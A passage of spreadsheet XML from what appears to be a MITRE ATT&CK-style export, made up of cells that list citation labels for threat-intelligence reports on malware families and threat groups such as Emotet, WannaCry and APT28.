Stuxnet Dossier),(Citation: reed thiefquest ransomware analysis),(Citation: Novetta Blockbuster),(Citation: Bitdefender Trickbot VNC module Whitepaper 2021),(Citation: Secureworks REvil September 2019),(Citation: ESET Windigo Mar 2014),(Citation: Kaspersky Lyceum October 2021),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Kaspersky MoleRATs April 2019),(Citation: BlackBerry Amadey 2020),(Citation: FireEye SUNSHUTTLE Mar 2021),(Citation: FOX-IT May 2016 Mofang),(Citation: Group IB GrimAgent July 2021),(Citation: Securelist Remexi Jan 2019),(Citation: Cyberreason Anchor December 2019),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Prevx Carberp March 2011),(Citation: FireEye Clandestine Fox),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation: NCC Group Chimera January 2021),(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>,(Citation: Microsoft GPO Bluetooth FEB 2009),(Citation: TechRepublic Wireless GPO FEB 2009)</t>
  </si>
  <si>
    <t>(Citation: Symantec Beetlejuice),</t>
  </si>
  <si>
    <t>,(Citation: TechNet Removable Media Control),(Citation: Microsoft Disable Autorun)</t>
  </si>
  <si>
    <t>(Citation: ESET Machete July 2019),(Citation: Avira Mustang Panda January 2020),(Citation: Securelist Machete Aug 2014),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: FireEye APT30),(Citation: Securelist Agent.btz),(Citation: Kaspersky ProjectSauron Full Report),(Citation: ESET Sednit USBStealer 2014),(Citation: TechNet Removable Media Control),(Citation: Microsoft Disable Autorun)</t>
  </si>
  <si>
    <t>(Citation: BleepingComputer Molerats Dec 2020),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: KISA Operation Muzabi),(Citation: MalwareBytes Ngrok February 2020),</t>
  </si>
  <si>
    <t>(Citation: Bitdefender Naikon April 2021),(Citation: Trend Micro DRBControl February 2020),(Citation: ESET Lazarus Jun 2020),(Citation: ESET ComRAT May 2020),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Checkpoint IndigoZebra July 2021),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: TrendMicro Confucius APT Feb 2018),(Citation: Talos Kimsuky Nov 2021),(Citation: TrendMicro EarthLusca 2022),(Citation: Microsoft HAFNIUM March 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Github PowerShell Empire),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: ESET Crutch December 2020),(Citation: Rclone),(Citation: ESET Nomadic Octopus 2018),(Citation: Symantec Waterbug Jun 2019),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Microsoft POLONIUM June 2022),(Citation: Talent-Jump Clambling February 2020),(Citation: FireEye Periscope March 2018),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: DFIR Conti Bazar Nov 2021),(Citation: FireEye APT29),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Github PowerShell Empire),</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Talos ZxShell Oct 2014),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: NCSC APT29 July 2020),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Trend Micro Iron Tiger April 2021),(Citation: KISA Operation Muzabi),(Citation: CISA SoreFang July 2016),(Citation: Secureworks REvil September 2019),(Citation: Microsoft GALLIUM December 2019),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Check Point Havij Analysis),(Citation: Cybereason PowerLess February 2022),(Citation: FireEye Exchange Zero Days March 2021),(Citation: Cybereason Soft Cell June 2019),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: Unit 42 Rocke January 2019),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: McAfee Night Dragon),(Citation: CISA AA20-296A Berserk Bear December 2020),(Citation: Securelist APT10 March 2021),(Citation: Novetta-Axiom),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: TrendMicro EarthLusca 2022),(Citation: Microsoft HAFNIUM March 2020),(Citation: Symantec Chafer February 2018),(Citation: Talos Rocke August 2018),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Cisco Group 72),(Citation: Volexity SolarWinds),(Citation: ClearkSky Fox Kitten February 2020),(Citation: CrowdStrike PIONEER KITTEN August 2020),(Citation: Tarrask scheduled task),(Citation: Unit 42 Siloscape Jun 2021),(Citation: RedCanary Mockingbird May 2020),(Citation: sqlmap Introduction),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FoxIT Wocao December 2019),(Citation: US District Court Indictment GRU Oct 2018),(Citation: Volexity Exchange Marauder March 2021),(Citation: Dragos PARISITE ),(Citation: FireEye APT41 March 2020),(Citation: ClearSky Pay2Kitten December 2020),(Citation: Microsoft NICKEL December 2021),(Citation: Check Point APT35 CharmPower January 2022),(Citation: TrendMicro BlackTech June 2017),(Citation: OWASP Top 10)</t>
  </si>
  <si>
    <t>(Citation: CheckPoint SpeakUp Feb 2019),(Citation: Securelist ScarCruft Jun 2016),(Citation: ESET OceanLotus Mar 2019),(Citation: PTSecurity Cobalt Dec 2016),(Citation: Accenture MUDCARP March 2019),(Citation: Volexity Patchwork June 2018),(Citation: TrendMicro Confucius APT Feb 2018),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: TrendMicro New Andariel Tactics July 2018),(Citation: FireEye Clandestine Wolf),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: McAfee Bankshot),(Citation: FireEye Periscope March 2018),(Citation: Securelist Dropping Elephant),(Citation: Talos Bisonal 10 Years March 2020),(Citation: Microsoft DUBNIUM June 2016),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Proofpoint TA459 April 2017),(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: Google EXOTIC LILY March 2022),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Eset Ramsay May 2020),(Citation: IssueMakersLab Andariel GoldenAxe May 2017),(Citation: Unit 42 BackConfig May 2020),(Citation: TrendMicro Tropic Trooper Mar 2018),(Citation: Symantec Elderwood Sept 2012),(Citation: McAfee Sandworm November 2013),(Citation: Talos Bisonal Mar 2020),(Citation: Symantec Inception Framework March 2018),(Citation: RiskIQ Cobalt Nov 2017),(Citation: Unit 42 Tropic Trooper Nov 2016),(Citation: Symantec Elfin Mar 2019),(Citation: Splunk Supernova Jan 2021),(Citation: PTSecurity Higaisa 2020),(Citation: Proofpoint Leviathan Oct 2017),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: TrendMicro Sandworm October 2014),(Citation: FireEye APT37 Feb 2018),(Citation: TrendMicro Tonto Team October 2020),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: Cyble Sidewinder September 2020),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: Symantec Patchwork),(Citation: Talos Frankenstein June 2019),(Citation: Uptycs Confucius APT Jan 2021),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Cylance Shaheen Nov 2018),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Gigamon Berserk Bear October 2021),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: MSTIC NOBELIUM May 2021),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Talos Group123),(Citation: Proofpoint Cobalt June 2017),(Citation: Trend Micro Tick November 2019),(Citation: ClearSky MuddyWater June 2019),(Citation: Cisco Group 72),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: iSight Sandworm Oct 2014),(Citation: Unit 42 Inception November 2018),(Citation: ATT Sidewinder January 2021),(Citation: Cyphort EvilBunny Dec 2014),(Citation: Carnegie Mellon University Supernova Dec 2020),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: RiskIQ Cobalt Jan 2018),(Citation: FireEye admin@338),(Citation: Cymmetria Patchwork),(Citation: FireEye HAWKBALL Jun 2019),(Citation: Antiy CERT Ramsay April 2020),(Citation: TrendMicro BlackTech June 2017),(Citation: FSI Andariel Campaign Rifle July 2017),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Microsoft Holmium June 2020),(Citation: Moran 2014),(Citation: Trend Micro Xbash Sept 2018),(Citation: F-Secure The Dukes),(Citation: Kaspersky CactusPete Aug 2020),(Citation: Sofacy DealersChoice),(Citation: PaloAlto Patchwork Mar 2018),(Citation: Talos Cobalt Strike September 2020),(Citation: FireEye APT41 Aug 2019),(Citation: Talos Cobalt Group July 2018),(Citation: Crowdstrike Global Threat Report Feb 2018),(Citation: Trend Micro IXESHE 2012),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: TrendMicro Cobalt Group Nov 2017),(Citation: Securelist Sofacy Feb 2018),(Citation: Unit42 Xbash Sept 2018),(Citation: FireEye Clandestine Fox),(Citation: Symantec Tick Apr 2016),(Citation: ESET InvisiMole June 2020),(Citation: Wikipedia Control Flow Integrity),(Citation: Windows Blogs Microsoft Edge Sandbox),(Citation: Ars Technica Pwn2Own 2017 VM Escape),(Citation: TechNet Moving Beyond EMET)</t>
  </si>
  <si>
    <t>,(Citation: Wikipedia Control Flow Integrity),(Citation: Ars Technica Pwn2Own 2017 VM Escape),(Citation: TechNet Moving Beyond EMET)</t>
  </si>
  <si>
    <t>(Citation: Bitdefender APT28 Dec 2015),(Citation: Microsoft SIR Vol 19),(Citation: Wikipedia Control Flow Integrity),(Citation: Ars Technica Pwn2Own 2017 VM Escape),(Citation: TechNet Moving Beyond EMET)</t>
  </si>
  <si>
    <t>(Citation: Check Point APT31 February 2021),(Citation: GitHub PoshC2),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Microsoft CVE-2021-1732 Feb 2021),(Citation: ESET T3 Threat Report 2021),(Citation: ESET Carberp March 2012),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: F-Secure The Dukes),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Profero APT27 December 2020),(Citation: FireEye APT32 May 2017),(Citation: FireEye Fin8 May 2016),(Citation: Microsoft SIR Vol 21),(Citation: trendmicro xcsset xcode project 2020),(Citation: Novetta-Axiom),(Citation: Group IB Cobalt Aug 2017),(Citation: Symantec Whitefly March 2019),(Citation: Unit 42 Hildegard Malware),(Citation: Unit42 AcidBox June 2020),(Citation: Github PowerShell Empire),(Citation: ESET Sednit July 2015),(Citation: FireEye APT33 Guardrail),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye FIN6 April 2016),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Bitdefender APT28 Dec 2015),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: DBAPPSecurity BITTER zero-day Feb 2021),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Unit 42 Siloscape Jun 2021),(Citation: Securelist Sofacy Feb 2018),(Citation: Microsoft PLATINUM April 2016),(Citation: TrendMicro Tonto Team October 2020),(Citation: Prevx Carberp March 2011),(Citation: Group IB Ransomware September 2020),(Citation: ESET InvisiMole June 2020),(Citation: Microsoft SIR Vol 19),(Citation: ESET Sednit Part 1),(Citation: Wikipedia Control Flow Integrity),(Citation: Microsoft Driver Block Rules),(Citation: Ars Technica Pwn2Own 2017 VM Escape),(Citation: TechNet Moving Beyond EMET)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: LogRhythm WannaCry),(Citation: GitHub PoshC2),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: US-CERT NotPetya 2017),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Unit 42 Lucifer June 2020),(Citation: Symantec Cicada November 2020),(Citation: FireEye APT28 Hospitality Aug 2017),(Citation: DFIR Ryuk's Return October 2020),(Citation: Red Canary Emotet Feb 2019),(Citation: DFIR Ryuk in 5 Hours October 2020),(Citation: Symantec Emotet Jul 2018),(Citation: Kaspersky Flame),(Citation: CISA AA20-296A Berserk Bear December 2020),(Citation: TrendMicro EarthLusca 2022),(Citation: Github PowerShell Empire),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: US-CERT Emotet Jul 2018),(Citation: ClearkSky Fox Kitten February 2020),(Citation: US-CERT WannaCry 2017),(Citation: CrowdStrike PIONEER KITTEN August 2020),(Citation: SANS Conficker),(Citation: FireEye WannaCry 2017),(Citation: Secure List Bad Rabbit),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Kaspersky Flame Functionality),(Citation: Unit42 Emissary Panda May 2019),(Citation: TrendMicro Tonto Team October 2020),(Citation: ClearSky Pay2Kitten December 2020),(Citation: Secureworks Emotet Nov 2018),(Citation: Crowdstrike Qakbot October 2020),(Citation: ESET InvisiMole June 2020),(Citation: MS17-010 March 2017),(Citation: ESET Trickbot Oct 2020),(Citation: Talos Nyetya June 2017),(Citation: Wikipedia Control Flow Integrity),(Citation: Ars Technica Pwn2Own 2017 VM Escape),(Citation: TechNet Moving Beyond EMET)</t>
  </si>
  <si>
    <t>(Citation: RSA2017 Detect and Respond Adair),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Cycraft Chimera April 2020),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: NCSC APT29 July 2020),(Citation: Anomali Linux Rabbit 2018),(Citation: Secureworks REvil September 2019),(Citation: Microsoft GALLIUM December 2019),(Citation: Cisco Talos Intelligence Group),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Cybereason Soft Cell June 2019),(Citation: CISA AA20-301A Kimsuky),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: McAfee Night Dragon),(Citation: CISA AA20-296A Berserk Bear December 2020),(Citation: FireEye APT41 Aug 2019),(Citation: Aqua Kinsing April 2020),(Citation: Unit 42 Hildegard Malware),(Citation: Intezer TeamTNT September 2020),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: DarkReading FireEye FIN5 Oct 2015),(Citation: NCC Group APT15 Alive and Strong),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: ESET BlackEnergy Jan 2016),(Citation: Intezer Doki July 20),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: FoxIT Wocao December 2019),(Citation: ESET Telebots June 2017),(Citation: FireEye Respond Webinar July 2017),(Citation: US-CERT TA18-074A),(Citation: BlackBerry CostaRicto November 2020),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: ANSSI Sandworm January 2021),(Citation: CrowdStrike StellarParticle January 2022),(Citation: FireEye TRITON 2019),(Citation: Microsoft NICKEL December 2021),(Citation: Dell TG-3390),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: ESET InvisiMole June 2018),(Citation: Bitdefender Naikon April 2021),(Citation: Check Point APT34 April 2021),(Citation: ESET Dukes October 2019),(Citation: Novetta Blockbuster RATs),(Citation: OilRig ISMAgent July 2017),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Novetta Blockbuster),(Citation: Proofpoint Bumblebee April 2022),(Citation: Malwarebytes Kimsuky June 2021),(Citation: DustySky),(Citation: Securelist BlackEnergy Nov 2014),(Citation: Kaspersky Lyceum October 2021),(Citation: Baumgartner Naikon 2015),(Citation: NCC Group Team9 June 2020),(Citation: Mandiant APT1),(Citation: McAfee Night Dragon),(Citation: Securelist MiniDuke Feb 2013),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: ESET Sednit Part 2),(Citation: FireEye APT41 Aug 2019),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: FireEye APT30),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Mandiant APT1 Appendix),(Citation: ESET Crutch December 2020),(Citation: ESET Gelsemium June 2021),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Symantec Orangeworm April 2018),(Citation: Mythc Documentation),(Citation: ESET Machete July 2019),(Citation: Unit 42 Valak July 2020),(Citation: ClearSky Siamesekitten August 2021),(Citation: FOX-IT May 2016 Mofang),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Unit 42 Kazuar May 2017),(Citation: Unit42 RDAT July 2020),(Citation: ESET PipeMon May 2020),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Cylance Dust Storm),(Citation: Symantec Linfo May 2012),(Citation: Cyberreason Anchor December 2019),(Citation: ANSSI Sandworm January 2021),(Citation: ESET Ebury Oct 2017),(Citation: ESET InvisiMole June 2020),(Citation: Fidelis Turbo),(Citation: ESET Sednit Part 1),(Citation: Talos TinyTurla September 2021),(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Lazarus Nov 2018),(Citation: Talos Smoke Loader July 2018),(Citation: TechNet Dir),(Citation: McAfee Gold Dragon),(Citation: Talos PoetRAT April 2020),(Citation: ESET Gelsemium June 2021),(Citation: Volexity SolarWinds),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Fysbis Dr Web Analysis),(Citation: Unit 42 BadPatch Oct 2017),(Citation: MSTIC FoggyWeb September 2021),(Citation: FireEye Metamorfo Apr 2018),(Citation: objsee mac malware 2017),(Citation: Trend Micro Ransomware February 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Eset Ramsay May 2020),(Citation: Palo Alto Networks BBSRAT),(Citation: Cylance Machete Mar 2017),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: McAfee Night Dragon),(Citation: CyberBit Dtrack),(Citation: Securelist ScarCruft May 2019),(Citation: Cybereason Bazar July 2020),(Citation: ESET Operation Groundbait),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: JPCert TSCookie March 2018),(Citation: Rancor Unit42 June 2018),(Citation: objective-see windtail1 dec 2018),(Citation: BlackBerry CostaRicto November 2020),(Citation: FireEye APT37 Feb 2018),(Citation: FireEye APT41 March 2020),(Citation: ESET Zebrocy Nov 2018),(Citation: FireEye APT10 Sept 2018),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Securelist APT10 March 2021),(Citation: BleepingComputer Molerats Dec 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Trend Micro Tick November 2019),(Citation: Unit 42 WhisperGate January 2022),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Palo Alto MoonWind March 2017),(Citation: ESET Sednit USBStealer 2014),(Citation: FireEye APT34 Dec 2017),(Citation: ESET Nomadic Octopus 2018),(Citation: FireEye APT17),(Citation: CheckPoint Naikon May 2020),(Citation: ESET ForSSHe December 2018),(Citation: McAfee Honeybee),(Citation: Check Point Warzone Feb 2020),(Citation: Unit 42 Kazuar May 2017),(Citation: Mandiant UNC3890 Aug 2022),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Palo Alto DNS Requests),(Citation: FBI FLASH APT39 September 2020),(Citation: ESET DazzleSpy Jan 2022),(Citation: objective-see windtail2 jan 2019),(Citation: GitHub PoshC2),(Citation: Application Bundle Manipulation Brandon Dalton),(Citation: ESET Dukes October 2019),(Citation: JPCert PLEAD Downloader June 2018),(Citation: Cylance Sodinokibi July 2019),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Überwachung APT28 Forfiles June 2015),(Citation: ATT QakBot April 2021),(Citation: Lookout Dark Caracal Jan 2018),(Citation: US-CERT KEYMARBLE Aug 2018),(Citation: NCC Group Chimera January 2021),(Citation: ESET InvisiMole June 2018),(Citation: Secureworks Karagany July 2019),(Citation: Proofpoint TA416 Europe March 2022),(Citation: KISA Operation Muzabi),(Citation: NCCGroup RokRat Nov 2018),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Baumgartner Naikon 2015),(Citation: Securelist BlackEnergy Nov 2014),(Citation: PWC KeyBoys Feb 2017),(Citation: Intel 471 REvil March 2020),(Citation: Cylance Shell Crew Feb 2017),(Citation: F-Secure BlackEnergy 2014),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Unit42 Azorult Nov 2018),(Citation: Lazarus APT January 2022),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: evolution of pirpi),(Citation: TrendMicro Confucius APT Aug 2021),(Citation: Symantec Linfo May 2012),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Volexity PowerDuke November 2016),(Citation: Trend Micro Cyclops Blink March 2022),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Talos Promethium June 2020),(Citation: Avira Mustang Panda January 2020),(Citation: McAfee GhostSecret),(Citation: Trend Micro KillDisk 2),(Citation: 360 Machete Sep 2020),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: Github PowerShell Empire),(Citation: Symantec Inception Framework March 2018),(Citation: Bitdefender APT28 Dec 2015),(Citation: McAfee Sodinokibi October 2019),(Citation: Novetta Winnti April 2015),(Citation: CME Github September 2018),(Citation: Microsoft POLONIUM June 2022),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: Symantec Remsec IOCs),(Citation: Unit42 BabyShark Feb 2019),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: Mcafee Clop Aug 2019),(Citation: LogRhythm WannaCry),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: CrowdStrike Ryuk January 2019),(Citation: Kaspersky Winnti April 2013),(Citation: Trend Micro Iron Tiger April 2021),(Citation: FireEye MESSAGETAP October 2019),(Citation: ESET Zebrocy May 2019),(Citation: Talos Kimsuky Nov 2021),(Citation: FireEye APT30),(Citation: Security Affairs DustSquad Oct 2018),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Prevailion DarkWatchman 2021),(Citation: ATT Sidewinder January 2021),(Citation: NCC Group WastedLocker June 2020),(Citation: Unit 42 Siloscape Jun 2021),(Citation: ESET Industroyer),(Citation: FireEye admin@338),(Citation: McAfee Sharpshooter December 2018),(Citation: ANSSI Sandworm January 2021),(Citation: ESET Ebury Oct 2017),(Citation: Securelist Kimsuky Sept 2013),(Citation: ESET Attor Oct 2019),(Citation: Fidelis Turbo),(Citation: Cybereason Kimsuky November 2020),(Citation: NCSC Cyclops Blink February 2022),(Citation: McAfee Cuba April 2021),(Citation: Korean FSI TA505 2020),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: ESET ComRAT May 2020),(Citation: F-Secure The Dukes),(Citation: Secureworks REvil September 2019),(Citation: DustySky),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: Symantec Frutas Feb 2013),(Citation: CarbonBlack Conti July 2020),(Citation: FireEye Clandestine Fox),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: Symantec Hydraq Jan 2010),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Talos ZxShell Oct 2014),(Citation: Check Point APT34 April 2021),(Citation: ESET OceanLotus Mar 2019),(Citation: Symantec Cicada November 2020),(Citation: Microsoft FinFisher March 2018),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: Leonardo Turla Penquin May 2020),(Citation: Kaspersky Sodin July 2019),(Citation: FireEye Periscope March 2018),(Citation: ESET Gamaredon June 2020),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Dell TG-3390),(Citation: Cybereason Oceanlotus May 2017),(Citation: ZScaler Hacking Team),(Citation: GitHub Pupy),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Securelist Octopus Oct 2018),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Palo Alto CVE-2015-3113 July 2015),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Arxiv Avaddon Feb 2021),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Intezer Doki July 20),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Securelist Dtrack),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Check Point APT35 CharmPower January 2022),(Citation: CrowdStrike IceApple May 2022),(Citation: Palo Alto Rover),(Citation: Trend Micro Skidmap),(Citation: Talos Lokibot Jan 2021),(Citation: Proofpoint TA505 October 2019),(Citation: Qualys LolZarus),(Citation: FireEye APT10 April 2017),(Citation: FinFisher Citation),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: XAgentOSX 2017),(Citation: Checkpoint IndigoZebra July 2021),(Citation: NCC Group Team9 June 2020),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Aqua Kinsing April 2020),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: Talos Konni May 2017),(Citation: Cybereason StrifeWater Feb 2022),(Citation: NHS UK BLINDINGCAN Aug 2020),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Securelist MuddyWater Oct 2018),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Trend Micro Trickbot Nov 2018),(Citation: 20 macOS Common Tools and Techniques),(Citation: Symantec Dragonfly),(Citation: Antiy CERT Ramsay April 2020),(Citation: TrendMicro BlackTech June 2017),(Citation: Bitdefender Naikon April 2021),(Citation: S2 Grupo TrickBot June 2017),(Citation: Microsoft WhisperGate January 2022),(Citation: Novetta-Axiom),(Citation: Fortinet Metamorfo Feb 2020),(Citation: US-CERT TYPEFRAME June 2018),(Citation: Kaspersky Adwind Feb 2016),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: CIRCL PlugX March 2013),(Citation: IBM MegaCortex),(Citation: ASERT Donot March 2018),(Citation: Group IB GrimAgent July 2021),(Citation: US-CERT Bankshot Dec 2017),(Citation: Microsoft PLATINUM April 2016),(Citation: Microsoft DUBNIUM July 2016),(Citation: PaloAlto DNS Requests May 2016),(Citation: Lotus Blossom Jun 2015),(Citation: Carbon Black HotCroissant April 2020),(Citation: Dragos Crashoverride 2018),(Citation: NCC Group Fivehands June 2021),(Citation: Scarlet Mimic Jan 2016),(Citation: Accenture MUDCARP March 2019),(Citation: Cybereason Molerats Dec 2020),(Citation: Unit42 Cannon Nov 2018),(Citation: ESET Sednit Part 2),(Citation: Talos GravityRAT),(Citation: Kaspersky Lab SynAck May 2018),(Citation: Zscaler Kasidet),(Citation: Unit 42 Gamaredon February 2022),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: Kaspersky Turla),(Citation: FireEye FiveHands April 2021),(Citation: Kaspersky ProjectSauron Full Report),(Citation: Fidelis njRAT June 2013),(Citation: SentinelOne Hermetic Wiper February 2022),(Citation: US-CERT TA18-074A),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Symantec Pasam May 2012),(Citation: Talos Oblique RAT March 2021),(Citation: Riskiq Remcos Jan 2018),(Citation: Cisco Ukraine Wipers January 2022),(Citation: CISA SoreFang July 2016),(Citation: F-Secure Cosmicduke),(Citation: Unit 42 BackConfig May 2020),(Citation: Symantec Leafminer July 2018),(Citation: Talos Bisonal Mar 2020),(Citation: Fortinet Diavol July 2021),(Citation: Symantec Sowbug Nov 2017),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Kaspersky Turla Aug 2014),(Citation: CrowdStrike Putter Panda),(Citation: FoxIT Wocao December 2019),(Citation: ESET Okrum July 2019),(Citation: Accenture Dragonfish Jan 2018),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: ESET Turla PowerShell May 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: Kaspersky Sofacy),(Citation: CISA Zebrocy Oct 2020),(Citation: Gigamon Berserk Bear October 2021),(Citation: Trustwave GoldenSpy June 2020),(Citation: US-CERT Volgmer Nov 2017),(Citation: Cisco Talos Intelligence Group),(Citation: Microsoft GALLIUM December 2019),(Citation: Medium S2W WhisperGate January 2022),(Citation: Medium Metamorfo Apr 2020),(Citation: FireEye APT32 May 2017),(Citation: CISA AA20-296A Berserk Bear December 2020),(Citation: Unit42 Redaman January 2019),(Citation: Symantec Orangeworm April 2018),(Citation: TrendMicro macOS Dacls May 2020),(Citation: US-CERT FALLCHILL Nov 2017),(Citation: ESET Machete July 2019),(Citation: FireEye WannaCry 2017),(Citation: GitHub Sliver File System August 2021),(Citation: Unit42 CookieMiner Jan 2019),(Citation: CheckPoint Bandook Nov 2020),(Citation: Cymmetria Patchwork),(Citation: Malwarebytes IssacWiper CaddyWiper March 2022 ),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: McAfee Oceansalt Oct 2018),(Citation: Microsoft NICKEL December 2021),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Unit 42 PingPull Jun 2022),(Citation: Kaspersky TajMahal April 2019),(Citation: Qualys Hermetic Wiper March 2022),(Citation: ASERT InnaputRAT April 2018),(Citation: Camba RARSTONE),(Citation: GDATA Zeus Panda June 2017),(Citation: FireEye EPS Awakens Part 2),(Citation: Novetta Blockbuster),(Citation: Kaspersky CactusPete Aug 2020),(Citation: Kaspersky MoleRATs April 2019),(Citation: Trend Micro IXESHE 2012),(Citation: Microsoft Actinium February 2022),(Citation: Rclone),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: sentinelone shlayer to zshlayer),(Citation: FOX-IT May 2016 Mofang),(Citation: Securelist Sofacy Feb 2018),(Citation: Trend Micro Muddy Water March 2021),(Citation: Proofpoint NETWIRE December 2020),(Citation: Talent-Jump Clambling February 